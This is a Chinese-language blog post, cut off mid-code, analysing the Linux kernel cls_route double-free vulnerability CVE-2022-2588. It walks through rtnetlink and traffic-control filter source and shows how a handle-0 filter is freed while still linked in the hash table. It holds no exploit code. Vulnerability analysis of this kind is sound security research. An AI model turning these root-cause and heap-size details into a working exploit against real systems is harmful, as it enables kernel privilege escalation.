CVE-2022-2588复现
196082 慢慢好起来

前言

本来不想分析CVE了,无奈前面提到了内核内部隔离机制,而在往期的文章中只在向pipe_buffer说yes! 文章中简要提到过通过实现页级的UAF来实现绕过的,可是还存在一种技术可以绕过,如果不记录下来是真的心痒,所以只能把syzkaller的学习计划往后推推进而来分析这一个利用方法。文件创建时间是10月19号,不想写文章了,懒狗症犯了

回到正题,这一漏洞出现在流量控制子系统包分类器的cls_route过滤器中,当旧过滤器的句柄为0时,在释放之前内核不会从哈希表中将其删除从而产生的Double Free。

Rtnetlink简述

这里直接抄我参考文章的原文,绝对不是我懒得写

Rtnetlink是所有内核网络子系统使用的网络连接总线,包括网络接口、路由、fdb和邻居。一些内核网络子系统也在通用netlink总线上提供服务。Linux内核网络子系统使用消息类型和系列向Rtnetlink内核注册处理程序。Rtnetlink允许读取和更改内核的路由表。它在内核中用于在各种子系统之间进行通信,也用于与用户空间程序进行通信。网络路由、IP地址、链接参数、邻居设置、排队规则、流量类别和数据包分类器都可以通过NETLINK_ROUTE套接字进行控制。Rtnetlink由以下消息类型组成(除了标准的netlink消息):

  • RTM_NEWLINK、RTM_DELLINK、RTM_GETLINK创建、删除或获取有关特定网络接口的信息。
  • RTM_NEWADDR、RTM_DELADDR、RTM_GETADDR添加、删除或接收有关与接口关联的IP地址的信息。
  • RTM_NEWROUTE、RTM_DELROUTE、RTM_GETROUTE创建、删除或接收有关网络路由的信息。
  • RTM_NEWNEIGH、RTM_DELNEIGH、RTM_GETNEIGH添加、删除或接收有关邻居表条目的信息(例如,ARP条目)。
  • RTM_NEWRULE、RTM_DELRULE、RTM_GETRULE添加、删除或检索路由规则。
  • RTM_NEWQDISC、RTM_DELQDISC、RTM_GETQDISC添加、删除或获取排队规则。
  • RTM_NEWTCLASS、RTM_DELTCLASS、RTM_GETTCLASS添加、删除或获取流量类别。
  • RTM_NEWTFILTER, RTM_DELTFILTER, RTM_GETTFILTER添加、删除或接收有关流量过滤器的信息。

实现原理

首先,当内核启动加载时会初始化netlink协议,此时会通过调用rtnetlink_init函数初始化路由netlink socket接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/* Boot-time initialization of the rtnetlink subsystem: registers the
 * per-net namespace ops and binds each RTM_* message type to its
 * doit (action) and/or dumpit (dump) callback via rtnl_register().
 * Panics if the pernet subsystem cannot be registered. */
void __init rtnetlink_init(void)
{
if (register_pernet_subsys(&rtnetlink_net_ops))
panic("rtnetlink_init: cannot initialize rtnetlink\n");

/* Notifier for network-device state changes. */
register_netdevice_notifier(&rtnetlink_dev_notifier);

rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
rtnl_dump_ifinfo, 0);
rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

/* GET-only types that are served by the generic dump-all path. */
rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL,
RTNL_FLAG_BULK_DEL_SUPPORTED);
rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
0);
rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}

由上面的代码可以看出来的,主要是通过rtnl_register函数将不同的消息类型和对应的操作进行了绑定,这里简单看一下这个函数定义

1
2
3
4
5
6
7
8
9
10
11
12
/* Thin wrapper around rtnl_register_internal(): registers a doit/dumpit
 * handler pair for (protocol, msgtype). On failure it only logs an
 * error — callers do not get a return value. */
void rtnl_register(int protocol, int msgtype,
rtnl_doit_func doit, rtnl_dumpit_func dumpit,
unsigned int flags)
{
int err;

err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
flags);
if (err)
pr_err("Unable to register rtnetlink message handler, "
"protocol = %d, message type = %d\n", protocol, msgtype);
}

可以发现这个函数其实就是rtnl_register_internal套了一层壳,这里主要关注rtnl_register的参数定义。前两个参数分别是协议和消息类型,紧随其后的是两个被传入的回调函数,这两个回调函数对应两种类型:第一种是动作函数doit,第二种是dump函数dumpit。从上面的初始化函数来看,有的消息类型只注册了第一个,有的只注册了第二个,还有的两者都有。从前面的简述中可以看到其实有的消息类型并没有在这里被初始化,比如RTM_NEWTFILTER(添加一个流量过滤器),它是在tc_filter_init函数中被初始化的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* Module init for the TC filter layer: sets up the ordered workqueue
 * used for deferred filter destruction (tcf_queue_work), registers the
 * pernet ops, and binds the RTM_*TFILTER / RTM_*CHAIN message types.
 * Note the filter handlers are registered RTNL_FLAG_DOIT_UNLOCKED. */
static int __init tc_filter_init(void)
{
int err;

tc_filter_wq = alloc_ordered_workqueue("tc_filter_workqueue", 0);
if (!tc_filter_wq)
return -ENOMEM;

err = register_pernet_subsys(&tcf_net_ops);
if (err)
goto err_register_pernet_subsys;

rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
tc_dump_chain, 0);

return 0;

err_register_pernet_subsys:
/* Unwind the workqueue allocation on pernet registration failure. */
destroy_workqueue(tc_filter_wq);
return err;
}

当用户通过NETLINK_ROUTE套接字发送RTM_NEWTFILTER消息用于创建一个流量过滤器时,内核会调用rtnetlink_rcv_msg函数来处理rtnetlink消息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
/* Central dispatcher for incoming rtnetlink messages. Extracts the
 * address family and message type from the netlink header, looks up the
 * registered rtnl_link, enforces CAP_NET_ADMIN for non-GET requests,
 * and invokes either the dumpit (GET + NLM_F_DUMP) or the doit handler.
 * Handlers flagged RTNL_FLAG_DOIT_UNLOCKED run without the rtnl mutex. */
static int rtnetlink_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
struct netlink_ext_ack *extack)
{
struct net *net = sock_net(skb->sk);
struct rtnl_link *link;
enum rtnl_kinds kind;
struct module *owner;
int err = -EOPNOTSUPP;
rtnl_doit_func doit;
unsigned int flags;
int family;
int type;

type = nlh->nlmsg_type;
if (type > RTM_MAX)
return -EOPNOTSUPP;

/* Types are stored relative to RTM_BASE in the handler tables. */
type -= RTM_BASE;

/* All the messages must have at least 1 byte length */
if (nlmsg_len(nlh) < sizeof(struct rtgenmsg))
return 0;

family = ((struct rtgenmsg *)nlmsg_data(nlh))->rtgen_family;
kind = rtnl_msgtype_kind(type);

/* Only GET requests are allowed without CAP_NET_ADMIN. */
if (kind != RTNL_KIND_GET && !netlink_net_capable(skb, CAP_NET_ADMIN))
return -EPERM;

rcu_read_lock();
if (kind == RTNL_KIND_GET && (nlh->nlmsg_flags & NLM_F_DUMP)) {
struct sock *rtnl;
rtnl_dumpit_func dumpit;
u32 min_dump_alloc = 0;

/* Fall back to PF_UNSPEC if the family has no dumpit. */
link = rtnl_get_link(family, type);
if (!link || !link->dumpit) {
family = PF_UNSPEC;
link = rtnl_get_link(family, type);
if (!link || !link->dumpit)
goto err_unlock;
}
owner = link->owner;
dumpit = link->dumpit;

if (type == RTM_GETLINK - RTM_BASE)
min_dump_alloc = rtnl_calcit(skb, nlh);

err = 0;
/* need to do this before rcu_read_unlock() */
if (!try_module_get(owner))
err = -EPROTONOSUPPORT;

rcu_read_unlock();

rtnl = net->rtnl;
if (err == 0) {
struct netlink_dump_control c = {
.dump = dumpit,
.min_dump_alloc = min_dump_alloc,
.module = owner,
};
err = netlink_dump_start(rtnl, skb, nlh, &c);
/* netlink_dump_start() will keep a reference on
 * module if dump is still in progress.
 */
module_put(owner);
}
return err;
}

/* Non-dump path: resolve the doit handler, again falling back to
 * PF_UNSPEC when the specific family has none. */
link = rtnl_get_link(family, type);
if (!link || !link->doit) {
family = PF_UNSPEC;
link = rtnl_get_link(PF_UNSPEC, type);
if (!link || !link->doit)
goto out_unlock;
}

owner = link->owner;
if (!try_module_get(owner)) {
err = -EPROTONOSUPPORT;
goto out_unlock;
}

flags = link->flags;
if (kind == RTNL_KIND_DEL && (nlh->nlmsg_flags & NLM_F_BULK) &&
!(flags & RTNL_FLAG_BULK_DEL_SUPPORTED)) {
NL_SET_ERR_MSG(extack, "Bulk delete is not supported");
goto err_unlock;
}

if (flags & RTNL_FLAG_DOIT_UNLOCKED) {
/* Unlocked handler: call directly under RCU-released context,
 * without taking the rtnl mutex (e.g. tc_new_tfilter). */
doit = link->doit;
rcu_read_unlock();
if (doit)
err = doit(skb, nlh, extack);
module_put(owner);
return err;
}
rcu_read_unlock();

/* Locked handler: re-lookup under rtnl_lock to avoid racing with
 * handler unregistration. */
rtnl_lock();
link = rtnl_get_link(family, type);
if (link && link->doit)
err = link->doit(skb, nlh, extack);
rtnl_unlock();

module_put(owner);

return err;

out_unlock:
rcu_read_unlock();
return err;

err_unlock:
rcu_read_unlock();
return -EOPNOTSUPP;
}

可以看到函数的主要逻辑:首先从消息中取出其family和type,紧接着根据family和type获取到link,最后调用link->doit(skb, nlh, extack)。由前面的注册函数可以得知,对于RTM_NEWTFILTER消息其会调用如下函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
/* RTM_NEWTFILTER handler: creates or replaces a traffic-classifier
 * filter. Locates (or creates) the tcf_proto for the requested
 * protocol/priority on the target chain, then delegates the actual
 * filter creation to tp->ops->change() (e.g. route4_change for the
 * "route" classifier — the entry point of CVE-2022-2588). */
static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
struct netlink_ext_ack *extack)
{
struct net *net = sock_net(skb->sk);
struct nlattr *tca[TCA_MAX + 1];
char name[IFNAMSIZ];
struct tcmsg *t;
u32 protocol;
u32 prio;
bool prio_allocate;
u32 parent;
u32 chain_index;
struct Qdisc *q;
struct tcf_chain_info chain_info;
struct tcf_chain *chain;
struct tcf_block *block;
struct tcf_proto *tp;
unsigned long cl;
void *fh;
int err;
int tp_created;
bool rtnl_held = false;
u32 flags;

if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
return -EPERM;

replay:
tp_created = 0;

err = nlmsg_parse_deprecated(n, sizeof(*t), tca, TCA_MAX,
rtm_tca_policy, extack);
if (err < 0)
return err;

t = nlmsg_data(n);
protocol = TC_H_MIN(t->tcm_info);
prio = TC_H_MAJ(t->tcm_info);
prio_allocate = false;
parent = t->tcm_parent;
tp = NULL;
cl = 0;
block = NULL;
q = NULL;
chain = NULL;
flags = 0;

if (prio == 0) {
/* If no priority is provided by the user,
 * we allocate one.
 */
if (n->nlmsg_flags & NLM_F_CREATE) {
prio = TC_H_MAKE(0x80000000U, 0U);
prio_allocate = true;
} else {
NL_SET_ERR_MSG(extack, "Invalid filter command with priority of zero");
return -ENOENT;
}
}

/* Find head of filter chain. */

err = __tcf_qdisc_find(net, &q, &parent, t->tcm_ifindex, false, extack);
if (err)
return err;

/* Copies the classifier kind (e.g. "route") into name. */
if (tcf_proto_check_kind(tca[TCA_KIND], name)) {
NL_SET_ERR_MSG(extack, "Specified TC filter name too long");
err = -EINVAL;
goto errout;
}

/* Take rtnl mutex if rtnl_held was set to true on previous iteration,
 * block is shared (no qdisc found), qdisc is not unlocked, classifier
 * type is not specified, classifier is not unlocked.
 */
if (rtnl_held ||
(q && !(q->ops->cl_ops->flags & QDISC_CLASS_OPS_DOIT_UNLOCKED)) ||
!tcf_proto_is_unlocked(name)) {
rtnl_held = true;
rtnl_lock();
}

err = __tcf_qdisc_cl_find(q, parent, &cl, t->tcm_ifindex, extack);
if (err)
goto errout;

block = __tcf_block_find(net, q, cl, t->tcm_ifindex, t->tcm_block_index,
extack);
if (IS_ERR(block)) {
err = PTR_ERR(block);
goto errout;
}
block->classid = parent;

chain_index = tca[TCA_CHAIN] ? nla_get_u32(tca[TCA_CHAIN]) : 0;
if (chain_index > TC_ACT_EXT_VAL_MASK) {
NL_SET_ERR_MSG(extack, "Specified chain index exceeds upper limit");
err = -EINVAL;
goto errout;
}
chain = tcf_chain_get(block, chain_index, true);
if (!chain) {
NL_SET_ERR_MSG(extack, "Cannot create specified filter chain");
err = -ENOMEM;
goto errout;
}

mutex_lock(&chain->filter_chain_lock);
/* Look up an existing tcf_proto for this protocol/priority. */
tp = tcf_chain_tp_find(chain, &chain_info, protocol,
prio, prio_allocate);
if (IS_ERR(tp)) {
NL_SET_ERR_MSG(extack, "Filter with specified priority/protocol not found");
err = PTR_ERR(tp);
goto errout_locked;
}

if (tp == NULL) {
struct tcf_proto *tp_new = NULL;

if (chain->flushing) {
err = -EAGAIN;
goto errout_locked;
}

/* Proto-tcf does not exist, create new one */

if (tca[TCA_KIND] == NULL || !protocol) {
NL_SET_ERR_MSG(extack, "Filter kind and protocol must be specified");
err = -EINVAL;
goto errout_locked;
}

if (!(n->nlmsg_flags & NLM_F_CREATE)) {
NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
err = -ENOENT;
goto errout_locked;
}

if (prio_allocate)
prio = tcf_auto_prio(tcf_chain_tp_prev(chain,
&chain_info));

mutex_unlock(&chain->filter_chain_lock);
/* Allocates the tcf_proto and calls tp->ops->init()
 * (e.g. route4_init, which allocates the route4_head). */
tp_new = tcf_proto_create(name, protocol, prio, chain,
rtnl_held, extack);
if (IS_ERR(tp_new)) {
err = PTR_ERR(tp_new);
goto errout_tp;
}

tp_created = 1;
tp = tcf_chain_tp_insert_unique(chain, tp_new, protocol, prio,
rtnl_held);
if (IS_ERR(tp)) {
err = PTR_ERR(tp);
goto errout_tp;
}
} else {
mutex_unlock(&chain->filter_chain_lock);
}

if (tca[TCA_KIND] && nla_strcmp(tca[TCA_KIND], tp->ops->kind)) {
NL_SET_ERR_MSG(extack, "Specified filter kind does not match existing one");
err = -EINVAL;
goto errout;
}

/* Look up an existing filter by handle (e.g. route4_get). */
fh = tp->ops->get(tp, t->tcm_handle);

if (!fh) {
if (!(n->nlmsg_flags & NLM_F_CREATE)) {
NL_SET_ERR_MSG(extack, "Need both RTM_NEWTFILTER and NLM_F_CREATE to create a new filter");
err = -ENOENT;
goto errout;
}
} else if (n->nlmsg_flags & NLM_F_EXCL) {
tfilter_put(tp, fh);
NL_SET_ERR_MSG(extack, "Filter already exists");
err = -EEXIST;
goto errout;
}

if (chain->tmplt_ops && chain->tmplt_ops != tp->ops) {
NL_SET_ERR_MSG(extack, "Chain template is set to a different filter kind");
err = -EINVAL;
goto errout;
}

if (!(n->nlmsg_flags & NLM_F_CREATE))
flags |= TCA_ACT_FLAGS_REPLACE;
if (!rtnl_held)
flags |= TCA_ACT_FLAGS_NO_RTNL;
/* Delegate creation/replacement to the classifier, passing the
 * old filter (if any) back through &fh. */
err = tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh,
flags, extack);
if (err == 0) {
tfilter_notify(net, skb, n, tp, block, q, parent, fh,
RTM_NEWTFILTER, false, rtnl_held);
tfilter_put(tp, fh);
/* q pointer is NULL for shared blocks */
if (q)
q->flags &= ~TCQ_F_CAN_BYPASS;
}

errout:
if (err && tp_created)
tcf_chain_tp_delete_empty(chain, tp, rtnl_held, NULL);
errout_tp:
if (chain) {
if (tp && !IS_ERR(tp))
tcf_proto_put(tp, rtnl_held, NULL);
if (!tp_created)
tcf_chain_put(chain);
}
tcf_block_release(q, block, rtnl_held);

if (rtnl_held)
rtnl_unlock();

if (err == -EAGAIN) {
/* Take rtnl lock in case EAGAIN is caused by concurrent flush
 * of target chain.
 */
rtnl_held = true;
/* Replay the request. */
goto replay;
}
return err;

errout_locked:
mutex_unlock(&chain->filter_chain_lock);
goto errout;
}

这里简单说一下上面函数的逻辑,首先通过tcf_proto_check_kind(tca[TCA_KIND], name)获取过滤器的名字,随后通过tp = tcf_chain_tp_find(chain, &chain_info, protocol, prio, prio_allocate)获取指定协议的过滤器tp,如果tp为null则会创建新的tp,这里通过tp_new = tcf_proto_create(name, protocol, prio, chain, rtnl_held, extack);函数进行创建

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/* Allocate and initialize a tcf_proto for the given classifier kind.
 * Resolves the classifier ops by name (taking a module reference),
 * fills in the common fields, and calls the classifier's init hook.
 * Returns an ERR_PTR on failure; the module ref is dropped if init
 * fails. */
static struct tcf_proto *tcf_proto_create(const char *kind, u32 protocol,
u32 prio, struct tcf_chain *chain,
bool rtnl_held,
struct netlink_ext_ack *extack)
{
struct tcf_proto *tp;
int err;

tp = kzalloc(sizeof(*tp), GFP_KERNEL);
if (!tp)
return ERR_PTR(-ENOBUFS);

/* Look up ops (e.g. cls_route4_ops for kind "route"). */
tp->ops = tcf_proto_lookup_ops(kind, rtnl_held, extack);
if (IS_ERR(tp->ops)) {
err = PTR_ERR(tp->ops);
goto errout;
}
tp->classify = tp->ops->classify;
tp->protocol = protocol;
tp->prio = prio;
tp->chain = chain;
spin_lock_init(&tp->lock);
refcount_set(&tp->refcnt, 1);

err = tp->ops->init(tp);
if (err) {
module_put(tp->ops->owner);
goto errout;
}
return tp;

errout:
kfree(tp);
return ERR_PTR(err);
}

首先是为tp分配了一个object随后通过tcf_proto_lookup_ops函数根据kind获取到对应的ops

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Find registered classifier ops by kind string. Walks the global
 * tcf_proto_base list under cls_mod_lock; on a name match, takes a
 * module reference before returning. Returns NULL if kind is NULL,
 * not found, or the owning module is going away. */
static const struct tcf_proto_ops *__tcf_proto_lookup_ops(const char *kind)
{
const struct tcf_proto_ops *t, *res = NULL;

if (kind) {
read_lock(&cls_mod_lock);
list_for_each_entry(t, &tcf_proto_base, head) {
if (strcmp(kind, t->kind) == 0) {
if (try_module_get(t->owner))
res = t;
break;
}
}
read_unlock(&cls_mod_lock);
}
return res;
}

这里以route为例子

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Classifier ops table for the "route" filter (cls_route).
 * route4_change is the creation/replacement hook where the
 * CVE-2022-2588 double-free originates. */
static struct tcf_proto_ops cls_route4_ops __read_mostly = {
.kind = "route",
.classify = route4_classify,
.init = route4_init,
.destroy = route4_destroy,
.get = route4_get,
.change = route4_change,
.delete = route4_delete,
.walk = route4_walk,
.dump = route4_dump,
.bind_class = route4_bind_class,
.owner = THIS_MODULE,
};

上面的ops将会获得如上cls_route4_ops结构体随后会调用tp->ops->init(tp)进行初始化

1
2
3
4
5
6
7
8
9
10
11
/* Classifier init hook: allocate the route4_head hash-table root and
 * publish it as tp->root via RCU. Returns -ENOBUFS on allocation
 * failure. */
static int route4_init(struct tcf_proto *tp)
{
struct route4_head *head;

head = kzalloc(sizeof(struct route4_head), GFP_KERNEL);
if (head == NULL)
return -ENOBUFS;

rcu_assign_pointer(tp->root, head);
return 0;
}

可以看到该函数会生成一个route4_head结构体,此结构体的作用是用于存放过滤器对应的哈希值。

接着回到tc_new_tfilter函数,其会将新生成的tp加入到chain中。接下来就会通过fh = tp->ops->get(tp, t->tcm_handle)语句调用对应的get函数,根据tcm_handle获取到过滤器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/* Look up a route4_filter by handle. The handle encodes two hash
 * indices: to_hash(handle) selects the bucket in head->table and
 * from_hash(handle >> 16) selects the chain inside the bucket.
 * Returns the matching filter or NULL. */
static void *route4_get(struct tcf_proto *tp, u32 handle)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_bucket *b;
struct route4_filter *f;
unsigned int h1, h2;

h1 = to_hash(handle);
/* NOTE(review): bound appears inclusive of index 256 — presumably
 * head->table has 256+1 slots; confirm against struct definition. */
if (h1 > 256)
return NULL;

h2 = from_hash(handle >> 16);
if (h2 > 32)
return NULL;

b = rtnl_dereference(head->table[h1]);
if (b) {
for (f = rtnl_dereference(b->ht[h2]);
f;
f = rtnl_dereference(f->next))
if (f->handle == handle)
return f;
}
return NULL;
}

这里会根据handle从route4_head哈希表中获取对应的route4_filter。如果返回为空,会接着进入到tc_new_tfilter函数的后续流程,最终在tp->ops->change(net, skb, tp, cl, t->tcm_handle, tca, &fh, flags, extack)语句调用change函数创建一个新的过滤器。

漏洞分析

漏洞出现在route4_change函数中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
/* Create or replace a route4 filter (tp->ops->change hook).
 *
 * CVE-2022-2588: when replacing an existing filter (fold != NULL), the
 * old filter is only unlinked from the hash table if fold->handle is
 * non-zero (see the "fold && fold->handle" condition below), but it is
 * unconditionally queued for freeing at the end (the "if (fold)"
 * branch). A filter created with handle == 0 therefore stays reachable
 * through the hash table after being freed, enabling a double free
 * when route4_delete later walks the table. */
static int route4_change(struct net *net, struct sk_buff *in_skb,
struct tcf_proto *tp, unsigned long base, u32 handle,
struct nlattr **tca, void **arg, u32 flags,
struct netlink_ext_ack *extack)
{
struct route4_head *head = rtnl_dereference(tp->root);
struct route4_filter __rcu **fp;
struct route4_filter *fold, *f1, *pfp, *f = NULL;
struct route4_bucket *b;
struct nlattr *opt = tca[TCA_OPTIONS];
struct nlattr *tb[TCA_ROUTE4_MAX + 1];
unsigned int h, th;
int err;
bool new = true;

if (opt == NULL)
return handle ? -EINVAL : 0;

err = nla_parse_nested_deprecated(tb, TCA_ROUTE4_MAX, opt,
route4_policy, NULL);
if (err < 0)
return err;

/* fold is the existing filter found by route4_get (may be NULL). */
fold = *arg;
if (fold && handle && fold->handle != handle)
return -EINVAL;

err = -ENOBUFS;
f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
if (!f)
goto errout;

/* Allocates f->exts.actions (the second double-freed object). */
err = tcf_exts_init(&f->exts, net, TCA_ROUTE4_ACT, TCA_ROUTE4_POLICE);
if (err < 0)
goto errout;

if (fold) {
/* Replacement: inherit identity fields from the old filter. */
f->id = fold->id;
f->iif = fold->iif;
f->res = fold->res;
f->handle = fold->handle;

f->tp = fold->tp;
f->bkt = fold->bkt;
new = false;
}

err = route4_set_parms(net, tp, base, f, handle, head, tb,
tca[TCA_RATE], new, flags, extack);
if (err < 0)
goto errout;

/* Insert the new filter into its bucket chain, ordered by handle. */
h = from_hash(f->handle >> 16);
fp = &f->bkt->ht[h];
for (pfp = rtnl_dereference(*fp);
(f1 = rtnl_dereference(*fp)) != NULL;
fp = &f1->next)
if (f->handle < f1->handle)
break;

tcf_block_netif_keep_dst(tp->chain->block);
rcu_assign_pointer(f->next, f1);
rcu_assign_pointer(*fp, f);

/* BUG: the unlink of the old filter is skipped when
 * fold->handle == 0, yet fold is still freed below. */
if (fold && fold->handle && f->handle != fold->handle) {
th = to_hash(fold->handle);
h = from_hash(fold->handle >> 16);
b = rtnl_dereference(head->table[th]);
if (b) {
fp = &b->ht[h];
for (pfp = rtnl_dereference(*fp); pfp;
fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
if (pfp == fold) {
rcu_assign_pointer(*fp, fold->next);
break;
}
}
}
}

route4_reset_fastmap(head);
*arg = f;
if (fold) {
/* Unconditional free of fold — mismatched with the guarded
 * unlink above; the freed filter may remain in the table. */
tcf_unbind_filter(tp, &fold->res);
tcf_exts_get_net(&fold->exts);
tcf_queue_work(&fold->rwork, route4_delete_filter_work);
}
return 0;

errout:
if (f)
tcf_exts_destroy(&f->exts);
kfree(f);
return err;
}

简单分析一下,这里会进一步解析数据包,通过fold = *arg;语句拿出route4_filter,然后判断是否存在,是否handlehandle是否一致,因为是第一次创建这里的fold为空。接着会通过f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL)创建一个结构体,并对其调用tcf_exts_init函数进行初始化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Initialize a filter's extension block. With CONFIG_NET_CLS_ACT the
 * actions array (TCA_ACT_MAX_PRIO pointers) is heap-allocated — this
 * is the kmalloc-256 object targeted by the CVE-2022-2588 exploit. */
static inline int tcf_exts_init(struct tcf_exts *exts, struct net *net,
int action, int police)
{
#ifdef CONFIG_NET_CLS_ACT
exts->type = 0;
exts->nr_actions = 0;
/* Note: we do not own yet a reference on net.
 * This reference might be taken later from tcf_exts_get_net().
 */
exts->net = net;
exts->actions = kcalloc(TCA_ACT_MAX_PRIO, sizeof(struct tc_action *),
GFP_KERNEL);
if (!exts->actions)
return -ENOMEM;
#endif
exts->action = action;
exts->police = police;
return 0;
}

从上述代码可以看到,如果内核开启了CONFIG_NET_CLS_ACT选项就会为其分配actions成员,分配的大小是256字节。完毕之后回到route4_change中,如果fold存在,则会将其数据域复制给f。随后调用route4_set_parms函数设置其他参数,后面将新创建的route4_filter按哈希值放到对应的route4_head中。

接下来进入if (fold && fold->handle && f->handle != fold->handle) {分支中删除掉旧的route4_filter的哈希值,当然在第一次运行时这里是不会进入的。

在最后判断fold是否为空,如果不为空则调用tcf_queue_work函数对其进行释放操作

1
2
3
4
5
6
/* Queue func to run on the TC filter workqueue after an RCU grace
 * period — used to defer filter destruction until readers are done. */
bool tcf_queue_work(struct rcu_work *rwork, work_func_t func)
{
INIT_RCU_WORK(rwork, func);
return queue_rcu_work(tc_filter_wq, rwork);
}
EXPORT_SYMBOL(tcf_queue_work);

这个函数是个rcu回调,这里就看他的回调函数即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/* Free a route4_filter: destroy its extensions (frees exts.actions),
 * drop the net reference, then free the filter itself. */
static void __route4_delete_filter(struct route4_filter *f)
{
tcf_exts_destroy(&f->exts);
tcf_exts_put_net(&f->exts);
kfree(f);
}

/* Deferred-destruction work callback (queued via tcf_queue_work):
 * frees the filter under rtnl_lock after the RCU grace period. */
static void route4_delete_filter_work(struct work_struct *work)
{
struct route4_filter *f = container_of(to_rcu_work(work),
struct route4_filter,
rwork);
rtnl_lock();
__route4_delete_filter(f);
rtnl_unlock();
}

可以看到其函数实现就是释放对应的成员之后再释放掉f

通过上述流程看起来还是蛮正常的,这里出现问题的地方在于清除哈希表项和最后释放结构体的if条件不一致。可以注意到的是,在前面清除哈希表项时会判断其handle是否非零,如果为零则不会进入该分支;但是后面只判断了fold是否存在。如果我们创建一个handle为0的过滤器,则不会进入上面的清除分支而只会进入下面的释放分支,从而导致其表项还残留在route4_head中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
/* Delete a single route4 filter (tp->ops->delete hook): unlink it from
